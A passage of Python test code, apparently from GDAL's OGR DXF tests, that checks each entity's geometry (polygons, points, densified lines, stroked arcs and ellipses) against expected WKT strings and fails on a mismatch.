if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 2.0 -2e-16,-1.96657794502105 2.03582232791524 -1.96657794502105e-16,-1.93571660708646 2.07387296203834 -1.93571660708646e-16,-1.90756413746468 2.11396923855471 -1.90756413746468e-16,-1.88225568337755 2.15591867344963 -1.88225568337755e-16,-1.85991273921989 2.19951988653655 -1.85991273921989e-16,-1.84064256332004 2.24456356819194 -1.84064256332004e-16,-1.8245376630414 2.29083348415575 -1.8245376630414e-16,-1.81167535069652 2.33810751357387 -1.81167535069652e-16,-1.80211737240583 2.38615871529951 -1.80211737240583e-16,-1.79590961168258 2.43475641733454 -1.79590961168258e-16,-1.79308186916688 2.48366732418105 -1.79308186916688e-16,-1.79364771956639 2.53265663678705 -1.79364771956639e-16,-1.79760444649032 2.58148917971011 -1.79760444649032e-16,-1.80493305548955 2.62993053008785 -1.80493305548955e-16,-1.81559836524041 2.67774814299566 -1.81559836524041e-16,-1.8295491764342 2.72471246778926 -1.8295491764342e-16,-1.84671851756181 2.7705980500731 -1.84671851756181e-16,-1.86702396641357 2.81518461400453 -1.86702396641357e-16,-1.89036804575079 2.85825811973811 -1.89036804575079e-16,-1.91663869124976 2.89961179093366 -1.91663869124976e-16,-1.94570978947168 2.93904710739563 -1.94570978947168e-16,-1.97744178327594 2.97637475807832 -1.97744178327594e-16,-2.01168234177068 3.01141554988232 -2.01168234177068e-16,-2.04826709158413 3.04400126787917 -2.04826709158413e-16,-2.08702040594658 3.07397548283483 -2.08702040594658e-16,-2.12775624779472 3.10119430215541 -2.12775624779472e-16,-2.17027906285109 3.12552706065018 -2.17027906285109e-16,-2.2143847183914 3.14685694779575 -2.2143847183914e-16,-2.25986148319297 3.16508156849045 -2.25986148319297e-16,-2.30649104396024 3.18011343460661 -2.30649104396024e-16,-2.35404955334774 3.1918803849814 -2.35404955334774e-16,-2.40230870454951 3.20032593182975 -2.40230870454951e-16,-2.45103682729644 3.2054095319166 -2.45103682729644e-16,' + \
'-2.5 3.20710678118655 -2.5e-16,-2.54896317270356 3.2054095319166 -2.54896317270356e-16,-2.59769129545049 3.20032593182975 -2.59769129545049e-16,-2.64595044665226 3.1918803849814 -2.64595044665226e-16,-2.69350895603976 3.18011343460661 -2.69350895603976e-16,-2.74013851680703 3.16508156849045 -2.74013851680703e-16,-2.7856152816086 3.14685694779575 -2.7856152816086e-16,-2.8297209371489 3.12552706065018 -2.8297209371489e-16,-2.87224375220528 3.10119430215541 -2.87224375220528e-16,-2.91297959405342 3.07397548283483 -2.91297959405342e-16,-2.95173290841587 3.04400126787917 -2.95173290841587e-16,-2.98831765822932 3.01141554988232 -2.98831765822932e-16,-3.02255821672406 2.97637475807832 -3.02255821672406e-16,-3.05429021052832 2.93904710739563 -3.05429021052832e-16,-3.08336130875024 2.89961179093367 -3.08336130875024e-16,-3.10963195424921 2.85825811973811 -3.10963195424921e-16,-3.13297603358643 2.81518461400453 -3.13297603358643e-16,-3.15328148243819 2.7705980500731 -3.15328148243819e-16,-3.1704508235658 2.72471246778926 -3.1704508235658e-16,-3.18440163475959 2.67774814299567 -3.18440163475959e-16,-3.19506694451045 2.62993053008786 -3.19506694451045e-16,-3.20239555350968 2.58148917971011 -3.20239555350968e-16,-3.20635228043361 2.53265663678705 -3.20635228043361e-16,-3.20691813083312 2.48366732418105 -3.20691813083312e-16,-3.20409038831742 2.43475641733454 -3.20409038831742e-16,-3.19788262759417 2.38615871529951 -3.19788262759417e-16,-3.18832464930348 2.33810751357387 -3.18832464930349e-16,-3.1754623369586 2.29083348415575 -3.1754623369586e-16,-3.15935743667996 2.24456356819194 -3.15935743667996e-16,-3.14008726078011 2.19951988653655 -3.14008726078011e-16,-3.11774431662245 2.15591867344963 -3.11774431662245e-16,-3.09243586253532 2.11396923855472 -3.09243586253532e-16,-3.06428339291354 2.07387296203834 -3.06428339291354e-16,-3.03342205497895 2.03582232791524 -3.03342205497895e-16,-3 2 -3e-16)'):
# Geometry mismatch: dump the actual geometry to aid debugging, then fail.
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):20
# EntityHandle (String) = 20E
# POLYGON Z ((-1 2 -1e-16,-1 3 -1e-16,-2 3 -2e-16,-2 2 -2e-16,-1 2 -1e-16))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-1 2 -1e-16,-1 3 -1e-16,-2 3 -2e-16,-2 2 -2e-16,-1 2 -1e-16))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):21
# EntityHandle (String) = 20F
# POLYGON ((-3 4,-4 4,-4 3,-3 3,-3 4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-3 4,-4 4,-4 3,-3 3,-3 4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):22
# EntityHandle (String) = 211
# POLYGON ((-8 8,-9 8,-9 9,-8 9,-8 8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-8 8,-9 8,-9 9,-8 9,-8 8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):23
# EntityHandle (String) = 212
# LINESTRING (-2 2,-2.15384615384615 2.15384615384615,-2.30769230769231 2.30769230769231,-2.46153846153846 2.46153846153846,-2.61538461538461 2.61538461538461,-2.76923076923077 2.76923076923077,-2.92307692307692 2.92307692307692,-3.07692307692308 3.07692307692308,-3.23076923076923 3.23076923076923,-3.38461538461538 3.38461538461538,-3.53846153846154 3.53846153846154,-3.69230769230769 3.69230769230769,-3.84615384615385 3.84615384615385,-4 4,-4.15384615384615 4.15384615384615,-4.30769230769231 4.30769230769231,-4.46153846153846 4.46153846153846,-4.61538461538462 4.61538461538462,-4.76923076923077 4.76923076923077,-4.92307692307692 4.92307692307692,-5.07692307692308 5.07692307692308,-5.23076923076923 5.23076923076923,-5.38461538461538 5.38461538461538,-5.53846153846154 5.53846153846154,-5.69230769230769 5.69230769230769,-5.84615384615385 5.84615384615385,-6.0 6.0,-6.15384615384615 6.15384615384615,-6.30769230769231 6.30769230769231,-6.46153846153846 6.46153846153846,-6.61538461538462 6.61538461538462,-6.76923076923077 6.76923076923077,-6.92307692307692 6.92307692307692,-7.07692307692308 7.07692307692308,-7.23076923076923 7.23076923076923,-7.38461538461539 7.38461538461539,-7.53846153846154 7.53846153846154,-7.69230769230769 7.69230769230769,-7.84615384615385 7.84615384615385,-8 8)
# OGRFeature(entities):23 (handle 212): diagonal line densified into a
# 40-vertex LINESTRING (expected WKT dumped in the comment above).
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-2 2,-2.15384615384615 2.15384615384615,-2.30769230769231 2.30769230769231,-2.46153846153846 2.46153846153846,-2.61538461538461 2.61538461538461,-2.76923076923077 2.76923076923077,-2.92307692307692 2.92307692307692,-3.07692307692308 3.07692307692308,-3.23076923076923 3.23076923076923,-3.38461538461538 3.38461538461538,-3.53846153846154 3.53846153846154,-3.69230769230769 3.69230769230769,-3.84615384615385 3.84615384615385,-4 4,-4.15384615384615 4.15384615384615,-4.30769230769231 4.30769230769231,-4.46153846153846 4.46153846153846,-4.61538461538462 4.61538461538462,-4.76923076923077 4.76923076923077,-4.92307692307692 4.92307692307692,-5.07692307692308 5.07692307692308,-5.23076923076923 5.23076923076923,-5.38461538461538 5.38461538461538,-5.53846153846154 5.53846153846154,-5.69230769230769 5.69230769230769,-5.84615384615385 5.84615384615385,-6.0 6.0,-6.15384615384615 6.15384615384615,-6.30769230769231 6.30769230769231,-6.46153846153846 6.46153846153846,-6.61538461538462 6.61538461538462,-6.76923076923077 6.76923076923077,-6.92307692307692 6.92307692307692,-7.07692307692308 7.07692307692308,-7.23076923076923 7.23076923076923,-7.38461538461539 7.38461538461539,-7.53846153846154 7.53846153846154,-7.69230769230769 7.69230769230769,-7.84615384615385 7.84615384615385,-8 8)'):
# Geometry mismatch: dump the actual geometry to aid debugging, then fail.
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):24
# EntityHandle (String) = 213
# LINESTRING (-8 1,-7.62837370825536 0.987348067229724,-7.25775889681215 0.975707614760869,-6.88916704597178 0.966090122894857,-6.52360963603567 0.959507071933107,-6.16209814730525 0.956969942177043,-5.80564406008193 0.959490213928084,-5.45525885466714 0.968079367487651,-5.11195401136229 0.983748883157167,-4.77674101046882 1.00751024123805,-4.45063133228814 1.04037492203173,-4.13463645712167 1.08335440583961,-3.82976786527082 1.13746017296313,-3.53703703703704 1.2037037037037,-3.25745545272173 1.28309647836275,-2.99203459262631 1.37664997724169,-2.74178593705221 1.48537568064195,-2.50772096630085 1.61028506886495,-2.29085116067365 1.75238962221211,-2.09218800047203 1.91270082098484,-1.91270082098485 2.09218800047202,-1.75238962221211 2.29085116067364,-1.61028506886495 2.50772096630085,-1.48537568064195 2.74178593705221,-1.37664997724169 2.99203459262631,-1.28309647836275 3.25745545272172,-1.2037037037037 3.53703703703703,-1.13746017296313 3.82976786527082,-1.08335440583961 4.13463645712166,-1.04037492203173 4.45063133228814,-1.00751024123805 4.77674101046882,-0.983748883157167 5.11195401136229,-0.968079367487652 5.45525885466714,-0.959490213928084 5.80564406008193,-0.956969942177043 6.16209814730525,-0.959507071933108 6.52360963603567,-0.966090122894857 6.88916704597178,-0.975707614760869 7.25775889681216,-0.987348067229724 7.62837370825537,-1 8)
# OGRFeature(entities):24 (handle 213): curve approximated as a 40-vertex
# LINESTRING (expected WKT dumped in the comment above).
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-8 1,-7.62837370825536 0.987348067229724,-7.25775889681215 0.975707614760869,-6.88916704597178 0.966090122894857,-6.52360963603567 0.959507071933107,-6.16209814730525 0.956969942177043,-5.80564406008193 0.959490213928084,-5.45525885466714 0.968079367487651,-5.11195401136229 0.983748883157167,-4.77674101046882 1.00751024123805,-4.45063133228814 1.04037492203173,-4.13463645712167 1.08335440583961,-3.82976786527082 1.13746017296313,-3.53703703703704 1.2037037037037,-3.25745545272173 1.28309647836275,-2.99203459262631 1.37664997724169,-2.74178593705221 1.48537568064195,-2.50772096630085 1.61028506886495,-2.29085116067365 1.75238962221211,-2.09218800047203 1.91270082098484,-1.91270082098485 2.09218800047202,-1.75238962221211 2.29085116067364,-1.61028506886495 2.50772096630085,-1.48537568064195 2.74178593705221,-1.37664997724169 2.99203459262631,-1.28309647836275 3.25745545272172,-1.2037037037037 3.53703703703703,-1.13746017296313 3.82976786527082,-1.08335440583961 4.13463645712166,-1.04037492203173 4.45063133228814,-1.00751024123805 4.77674101046882,-0.983748883157167 5.11195401136229,-0.968079367487652 5.45525885466714,-0.959490213928084 5.80564406008193,-0.956969942177043 6.16209814730525,-0.959507071933108 6.52360963603567,-0.966090122894857 6.88916704597178,-0.975707614760869 7.25775889681216,-0.987348067229724 7.62837370825537,-1 8)'):
# Geometry mismatch: dump the actual geometry to aid debugging, then fail.
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):25
# EntityHandle (String) = 214
# POINT Z (-7 7 -7e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-7 7 -7e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):26
# EntityHandle (String) = 215
# POINT Z (-4 -4 -1e-15)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-4 -4 -1e-15)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):27
# EntityHandle (String) = 216
# LINESTRING Z (0 0 -2e-16,-1 -1 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 -2e-16,-1 -1 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):28
# EntityHandle (String) = 217
# LINESTRING (-1 -1,-2 -1,-1 -2,-1 -1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-1 -1,-2 -1,-1 -2,-1 -1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):29
# EntityHandle (String) = 218
# LINESTRING Z (-1 -1 -2e-16,-1 -2 -4e-16,-2 -2 -5e-16,-1 -1 -2e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1 -1 -2e-16,-1 -2 -4e-16,-2 -2 -5e-16,-1 -1 -2e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):30
# EntityHandle (String) = 21D
# LINESTRING Z (-2 -4 0,-2.00487189948035 -4.13951294748825 0,-2.01946386251686 -4.27834620192013 0,-2.04370479853239 -4.41582338163552 0,-2.07747660812336 -4.551274711634 0,-2.12061475842818 -4.68404028665134 0,-2.1729090847148 -4.8134732861516 0,-2.23410481428215 -4.93894312557178 0,-2.30390380768715 -5.05983852846641 0,-2.38196601125011 -5.17557050458495 0,-2.46791111376204 -5.28557521937308 0,-2.5613203993227 -5.38931674091799 0,-2.66173878728228 -5.48628965095479 0,-2.76867704934868 -5.57602150721344 0,-2.88161419305851 -5.65807514511008 0,-3.0 -5.73205080756888 0,-3.12325770642185 -5.79758809259833 0,-3.25078681316818 -5.85436770913357 0,-3.38196601125011 -5.90211303259031 0,-3.51615620880066 -5.94059145255199 0,-3.65270364466614 -5.96961550602442 0,-3.79094307346469 -5.98904379073655 0,-3.930201006595 -5.99878165403819 0,-4.069798993405 -5.99878165403819 0,-4.20905692653531 -5.98904379073655 0,-4.34729635533386 -5.96961550602442 0,-4.48384379119934 -5.94059145255199 0,-4.61803398874989 -5.90211303259031 0,-4.74921318683182 -5.85436770913357 0,-4.87674229357815 -5.79758809259833 0,-5.0 -5.73205080756888 0,-5.11838580694149 -5.65807514511008 0,-5.23132295065132 -5.57602150721344 0,-5.33826121271772 -5.48628965095479 0,-5.4386796006773 -5.38931674091799 0,-5.53208888623796 -5.28557521937308 0,-5.61803398874989 -5.17557050458495 0,-5.69609619231285 -5.05983852846641 0,-5.76589518571785 -4.93894312557178 0,-5.8270909152852 -4.8134732861516 0,-5.87938524157182 -4.68404028665134 0,-5.92252339187664 -4.551274711634 0,-5.95629520146761 -4.41582338163552 0,-5.98053613748314 -4.27834620192013 0,-5.99512810051965 -4.13951294748825 0,-6 -4 0,-5.99512810051965 -3.86048705251175 0,-5.98053613748314 -3.72165379807987 0,-5.95629520146761 -3.58417661836448 0,-5.92252339187664 -3.448725288366 0,-5.87938524157182 -3.31595971334866 0,-5.8270909152852 -3.1865267138484 0,-5.76589518571785 -3.06105687442822 0,-5.69609619231285 -2.94016147153359 0,-5.61803398874989 -2.82442949541505 
0,-5.53208888623796 -2.71442478062692 0,-5.4386796006773 -2.61068325908201 0,-5.33826121271772 -2.51371034904521 0,-5.23132295065132 -2.42397849278656 0,-5.11838580694149 -2.34192485488992 0,-5.0 -2.26794919243112 0,-4.87674229357816 -2.20241190740167 0,-4.74921318683182 -2.14563229086643 0,-4.61803398874989 -2.09788696740969 0,-4.48384379119934 -2.05940854744801 0,-4.34729635533386 -2.03038449397558 0,-4.20905692653531 -2.01095620926345 0,-4.069798993405 -2.00121834596181 0,-3.930201006595 -2.00121834596181 0,-3.79094307346469 -2.01095620926345 0,-3.65270364466614 -2.03038449397558 0,-3.51615620880067 -2.05940854744801 0,-3.38196601125011 -2.09788696740969 0,-3.25078681316818 -2.14563229086643 0,-3.12325770642185 -2.20241190740167 0,-3.0 -2.26794919243112 0,-2.88161419305851 -2.34192485488992 0,-2.76867704934868 -2.42397849278656 0,-2.66173878728228 -2.51371034904521 0,-2.5613203993227 -2.610683259082 0,-2.46791111376204 -2.71442478062692 0,-2.38196601125011 -2.82442949541505 0,-2.30390380768715 -2.94016147153359 0,-2.23410481428215 -3.06105687442822 0,-2.1729090847148 -3.1865267138484 0,-2.12061475842818 -3.31595971334866 0,-2.07747660812336 -3.448725288366 0,-2.04370479853239 -3.58417661836448 0,-2.01946386251686 -3.72165379807987 0,-2.00487189948035 -3.86048705251175 0,-2.0 -4.0 0)
# OGRFeature(entities):30 (handle 21D): full ellipse at z=0 stroked into a
# dense LINESTRING Z (expected WKT dumped in the comment above).
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 -4 0,-2.00487189948035 -4.13951294748825 0,-2.01946386251686 -4.27834620192013 0,-2.04370479853239 -4.41582338163552 0,-2.07747660812336 -4.551274711634 0,-2.12061475842818 -4.68404028665134 0,-2.1729090847148 -4.8134732861516 0,-2.23410481428215 -4.93894312557178 0,-2.30390380768715 -5.05983852846641 0,-2.38196601125011 -5.17557050458495 0,-2.46791111376204 -5.28557521937308 0,-2.5613203993227 -5.38931674091799 0,-2.66173878728228 -5.48628965095479 0,-2.76867704934868 -5.57602150721344 0,-2.88161419305851 -5.65807514511008 0,-3.0 -5.73205080756888 0,-3.12325770642185 -5.79758809259833 0,-3.25078681316818 -5.85436770913357 0,-3.38196601125011 -5.90211303259031 0,-3.51615620880066 -5.94059145255199 0,-3.65270364466614 -5.96961550602442 0,-3.79094307346469 -5.98904379073655 0,-3.930201006595 -5.99878165403819 0,-4.069798993405 -5.99878165403819 0,-4.20905692653531 -5.98904379073655 0,-4.34729635533386 -5.96961550602442 0,-4.48384379119934 -5.94059145255199 0,-4.61803398874989 -5.90211303259031 0,-4.74921318683182 -5.85436770913357 0,-4.87674229357815 -5.79758809259833 0,-5.0 -5.73205080756888 0,-5.11838580694149 -5.65807514511008 0,-5.23132295065132 -5.57602150721344 0,-5.33826121271772 -5.48628965095479 0,-5.4386796006773 -5.38931674091799 0,-5.53208888623796 -5.28557521937308 0,-5.61803398874989 -5.17557050458495 0,-5.69609619231285 -5.05983852846641 0,-5.76589518571785 -4.93894312557178 0,-5.8270909152852 -4.8134732861516 0,-5.87938524157182 -4.68404028665134 0,-5.92252339187664 -4.551274711634 0,-5.95629520146761 -4.41582338163552 0,-5.98053613748314 -4.27834620192013 0,-5.99512810051965 -4.13951294748825 0,-6 -4 0,-5.99512810051965 -3.86048705251175 0,-5.98053613748314 -3.72165379807987 0,-5.95629520146761 -3.58417661836448 0,-5.92252339187664 -3.448725288366 0,-5.87938524157182 -3.31595971334866 0,-5.8270909152852 -3.1865267138484 0,-5.76589518571785 -3.06105687442822 0,-5.69609619231285 
-2.94016147153359 0,-5.61803398874989 -2.82442949541505 0,-5.53208888623796 -2.71442478062692 0,-5.4386796006773 -2.61068325908201 0,-5.33826121271772 -2.51371034904521 0,-5.23132295065132 -2.42397849278656 0,-5.11838580694149 -2.34192485488992 0,-5.0 -2.26794919243112 0,-4.87674229357816 -2.20241190740167 0,-4.74921318683182 -2.14563229086643 0,-4.61803398874989 -2.09788696740969 0,-4.48384379119934 -2.05940854744801 0,-4.34729635533386 -2.03038449397558 0,-4.20905692653531 -2.01095620926345 0,-4.069798993405 -2.00121834596181 0,-3.930201006595 -2.00121834596181 0,-3.79094307346469 -2.01095620926345 0,-3.65270364466614 -2.03038449397558 0,-3.51615620880067 -2.05940854744801 0,-3.38196601125011 -2.09788696740969 0,-3.25078681316818 -2.14563229086643 0,-3.12325770642185 -2.20241190740167 0,-3.0 -2.26794919243112 0,-2.88161419305851 -2.34192485488992 0,-2.76867704934868 -2.42397849278656 0,-2.66173878728228 -2.51371034904521 0,-2.5613203993227 -2.610683259082 0,-2.46791111376204 -2.71442478062692 0,-2.38196601125011 -2.82442949541505 0,-2.30390380768715 -2.94016147153359 0,-2.23410481428215 -3.06105687442822 0,-2.1729090847148 -3.1865267138484 0,-2.12061475842818 -3.31595971334866 0,-2.07747660812336 -3.448725288366 0,-2.04370479853239 -3.58417661836448 0,-2.01946386251686 -3.72165379807987 0,-2.00487189948035 -3.86048705251175 0,-2.0 -4.0 0)'):
# Geometry mismatch: dump the actual geometry to aid debugging, then fail.
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):31
# EntityHandle (String) = 21E
# LINESTRING Z (-2 -4 -8e-16,-2.00487189948035 -4.06975647374412 -8.07462837322448e-16,-2.01946386251686 -4.13917310096007 -8.15863696347693e-16,-2.04370479853239 -4.20791169081776 -8.25161648935015e-16,-2.07747660812336 -4.275637355817 -8.35311396394036e-16,-2.12061475842818 -4.34202014332567 -8.46263490175385e-16,-2.1729090847148 -4.4067366430758 -8.5796457277906e-16,-2.23410481428215 -4.46947156278589 -8.70357637706804e-16,-2.30390380768715 -4.52991926423321 -8.83382307192036e-16,-2.38196601125011 -4.58778525229247 -8.96975126354258e-16,-2.46791111376204 -4.64278760968654 -9.11069872344859e-16,-2.5613203993227 -4.694658370459 -9.2559787697817e-16,-2.66173878728228 -4.74314482547739 -9.40488361275968e-16,-2.76867704934868 -4.78801075360672 -9.5566878029554e-16,-2.88161419305851 -4.82903757255504 -9.71065176561355e-16,-3.0 -4.86602540378444 -9.86602540378444e-16,-3.12325770642185 -4.89879404629917 -1.0022051752721e-15,-3.25078681316818 -4.92718385456679 -1.0177970667735e-15,-3.38196601125011 -4.95105651629515 -1.03330225275453e-15,-3.51615620880067 -4.970295726276 -1.04864519350767e-15,-3.65270364466614 -4.98480775301221 -1.06375113976783e-15,-3.79094307346469 -4.99452189536827 -1.0785464968833e-15,-3.930201006595 -4.9993908270191 -1.09295918336141e-15,-4.069798993405 -4.9993908270191 -1.10691898204241e-15,-4.20905692653531 -4.99452189536827 -1.12035788219036e-15,-4.34729635533386 -4.98480775301221 -1.13321041083461e-15,-4.48384379119934 -4.970295726276 -1.14541395174753e-15,-4.61803398874989 -4.95105651629515 -1.1569090505045e-15,-4.74921318683182 -4.92718385456679 -1.16763970413986e-15,-4.87674229357816 -4.89879404629917 -1.17755363398773e-15,-5.0 -4.86602540378444 -1.18660254037844e-15,-5.11838580694149 -4.82903757255504 -1.19474233794965e-15,-5.23132295065132 -4.78801075360672 -1.2019333704258e-15,-5.33826121271772 -4.74314482547739 -1.20814060381951e-15,-5.4386796006773 -4.694658370459 -1.21333379711363e-15,-5.53208888623796 -4.64278760968654 
-1.21748764959245e-15,-5.61803398874989 -4.58778525229247 -1.22058192410424e-15,-5.69609619231285 -4.5299192642332 -1.22260154565461e-15,-5.76589518571785 -4.46947156278589 -1.22353667485037e-15,-5.8270909152852 -4.4067366430758 -1.2233827558361e-15,-5.87938524157182 -4.34202014332567 -1.22214053848975e-15,-5.92252339187664 -4.275637355817 -1.21981607476936e-15,-5.95629520146761 -4.20791169081776 -1.21642068922854e-15,-5.98053613748314 -4.13917310096007 -1.21197092384432e-15,-5.99512810051965 -4.06975647374412 -1.20648845742638e-15,-6 -4 -1.2e-15,-5.99512810051965 -3.93024352625587 -1.19253716267755e-15,
# -5.98053613748314 -3.86082689903993 -1.18413630365231e-15,-5.95629520146761 -3.79208830918224 -1.17483835106499e-15,-5.92252339187664 -3.724362644183 -1.16468860360596e-15,-5.87938524157182 -3.65797985667433 -1.15373650982461e-15,-5.8270909152852 -3.5932633569242 -1.14203542722094e-15,-5.76589518571785 -3.53052843721411 -1.1296423622932e-15,-5.69609619231285 -3.4700807357668 -1.11661769280796e-15,-5.61803398874989 -3.41221474770753 -1.10302487364574e-15,-5.53208888623796 -3.35721239031346 -1.08893012765514e-15,-5.4386796006773 -3.305341629541 -1.07440212302183e-15,-5.33826121271772 -3.25685517452261 -1.05951163872403e-15,-5.23132295065132 -3.21198924639328 -1.04433121970446e-15,-5.11838580694149 -3.17096242744496 -1.02893482343865e-15,-5.0 -3.13397459621556 -1.01339745962156e-15,-4.87674229357815 -3.10120595370083 -9.97794824727899e-16,-4.74921318683182 -3.07281614543321 -9.82202933226504e-16,-4.61803398874989 -3.04894348370485 -9.66697747245474e-16,-4.48384379119934 -3.029704273724 -9.51354806492334e-16,-4.34729635533386 -3.01519224698779 -9.36248860232165e-16,-4.20905692653531 -3.00547810463173 -9.21453503116703e-16,-4.069798993405 -3.0006091729809 -9.07040816638591e-16,-3.930201006595 -3.0006091729809 -8.9308101795759e-16,-3.79094307346469 -3.00547810463173 -8.79642117809642e-16,-3.65270364466614 -3.01519224698779 -8.66789589165393e-16,-3.51615620880066 -3.029704273724 -8.54586048252467e-16,-3.38196601125011 -3.04894348370485 -8.43090949495495e-16,-3.25078681316818 -3.07281614543321 -8.32360295860139e-16,-3.12325770642185 -3.10120595370083 -8.22446366012268e-16,-3.0 -3.13397459621556 -8.13397459621556e-16,-2.88161419305851 -3.17096242744496 -8.05257662050347e-16,-2.76867704934868 -3.21198924639328 -7.98066629574196e-16,-2.66173878728228 -3.25685517452261 -7.91859396180489e-16,-2.5613203993227 -3.305341629541 -7.8666620288637e-16,-2.46791111376204 -3.35721239031346 -7.82512350407551e-16,-2.38196601125011 -3.41221474770753 -7.79418075895763e-16,-2.30390380768715 
-3.4700807357668 -7.77398454345394e-16,-2.23410481428215 -3.53052843721411 -7.76463325149626e-16,-2.1729090847148 -3.5932633569242 -7.766172441639e-16,-2.12061475842818 -3.65797985667433 -7.77859461510252e-16,-2.07747660812336 -3.724362644183 -7.80183925230636e-16,-2.04370479853239 -3.79208830918224 -7.83579310771463e-16,-2.01946386251686 -3.86082689903993 -7.88029076155679e-16,-2.00487189948035 -3.93024352625587 -7.93511542573623e-16,-2 -4 -8e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 -4 -8e-16,-2.00487189948035 -4.06975647374412 -8.07462837322448e-16,-2.01946386251686 -4.13917310096007 -8.15863696347693e-16,-2.04370479853239 -4.20791169081776 -8.25161648935015e-16,-2.07747660812336 -4.275637355817 -8.35311396394036e-16,-2.12061475842818 -4.34202014332567 -8.46263490175385e-16,-2.1729090847148 -4.4067366430758 -8.5796457277906e-16,-2.23410481428215 -4.46947156278589 -8.70357637706804e-16,-2.30390380768715 -4.52991926423321 -8.83382307192036e-16,-2.38196601125011 -4.58778525229247 -8.96975126354258e-16,-2.46791111376204 -4.64278760968654 -9.11069872344859e-16,-2.5613203993227 -4.694658370459 -9.2559787697817e-16,-2.66173878728228 -4.74314482547739 -9.40488361275968e-16,-2.76867704934868 -4.78801075360672 -9.5566878029554e-16,-2.88161419305851 -4.82903757255504 -9.71065176561355e-16,-3.0 -4.86602540378444 -9.86602540378444e-16,-3.12325770642185 -4.89879404629917 -1.0022051752721e-15,-3.25078681316818 -4.92718385456679 -1.0177970667735e-15,-3.38196601125011 -4.95105651629515 -1.03330225275453e-15,-3.51615620880067 -4.970295726276 -1.04864519350767e-15,-3.65270364466614 -4.98480775301221 -1.06375113976783e-15,-3.79094307346469 -4.99452189536827 -1.0785464968833e-15,-3.930201006595 -4.9993908270191 -1.09295918336141e-15,-4.069798993405 -4.9993908270191 -1.10691898204241e-15,-4.20905692653531 -4.99452189536827 -1.12035788219036e-15,-4.34729635533386 -4.98480775301221 -1.13321041083461e-15,-4.48384379119934 -4.970295726276 -1.14541395174753e-15,-4.61803398874989 -4.95105651629515 -1.1569090505045e-15,-4.74921318683182 -4.92718385456679 -1.16763970413986e-15,-4.87674229357816 -4.89879404629917 -1.17755363398773e-15,-5.0 -4.86602540378444 -1.18660254037844e-15,-5.11838580694149 -4.82903757255504 -1.19474233794965e-15,-5.23132295065132 -4.78801075360672 -1.2019333704258e-15,-5.33826121271772 -4.74314482547739 -1.20814060381951e-15,-5.4386796006773 -4.694658370459 
-1.21333379711363e-15,-5.53208888623796 -4.64278760968654 -1.21748764959245e-15,-5.61803398874989 -4.58778525229247 -1.22058192410424e-15,-5.69609619231285 -4.5299192642332 -1.22260154565461e-15,-5.76589518571785 -4.46947156278589 -1.22353667485037e-15,-5.8270909152852 -4.4067366430758 -1.2233827558361e-15,-5.87938524157182 -4.34202014332567 -1.22214053848975e-15,-5.92252339187664 -4.275637355817 -1.21981607476936e-15,-5.95629520146761 -4.20791169081776 -1.21642068922854e-15,-5.98053613748314 -4.13917310096007 -1.21197092384432e-15,-5.99512810051965 -4.06975647374412 -1.20648845742638e-15,-6 -4 -1.2e-15,-5.99512810051965 -3.93024352625587 -1.19253716267755e-15,' + \
'-5.98053613748314 -3.86082689903993 -1.18413630365231e-15,-5.95629520146761 -3.79208830918224 -1.17483835106499e-15,-5.92252339187664 -3.724362644183 -1.16468860360596e-15,-5.87938524157182 -3.65797985667433 -1.15373650982461e-15,-5.8270909152852 -3.5932633569242 -1.14203542722094e-15,-5.76589518571785 -3.53052843721411 -1.1296423622932e-15,-5.69609619231285 -3.4700807357668 -1.11661769280796e-15,-5.61803398874989 -3.41221474770753 -1.10302487364574e-15,-5.53208888623796 -3.35721239031346 -1.08893012765514e-15,-5.4386796006773 -3.305341629541 -1.07440212302183e-15,-5.33826121271772 -3.25685517452261 -1.05951163872403e-15,-5.23132295065132 -3.21198924639328 -1.04433121970446e-15,-5.11838580694149 -3.17096242744496 -1.02893482343865e-15,-5.0 -3.13397459621556 -1.01339745962156e-15,-4.87674229357815 -3.10120595370083 -9.97794824727899e-16,-4.74921318683182 -3.07281614543321 -9.82202933226504e-16,-4.61803398874989 -3.04894348370485 -9.66697747245474e-16,-4.48384379119934 -3.029704273724 -9.51354806492334e-16,-4.34729635533386 -3.01519224698779 -9.36248860232165e-16,-4.20905692653531 -3.00547810463173 -9.21453503116703e-16,-4.069798993405 -3.0006091729809 -9.07040816638591e-16,-3.930201006595 -3.0006091729809 -8.9308101795759e-16,-3.79094307346469 -3.00547810463173 -8.79642117809642e-16,-3.65270364466614 -3.01519224698779 -8.66789589165393e-16,-3.51615620880066 -3.029704273724 -8.54586048252467e-16,-3.38196601125011 -3.04894348370485 -8.43090949495495e-16,-3.25078681316818 -3.07281614543321 -8.32360295860139e-16,-3.12325770642185 -3.10120595370083 -8.22446366012268e-16,-3.0 -3.13397459621556 -8.13397459621556e-16,-2.88161419305851 -3.17096242744496 -8.05257662050347e-16,-2.76867704934868 -3.21198924639328 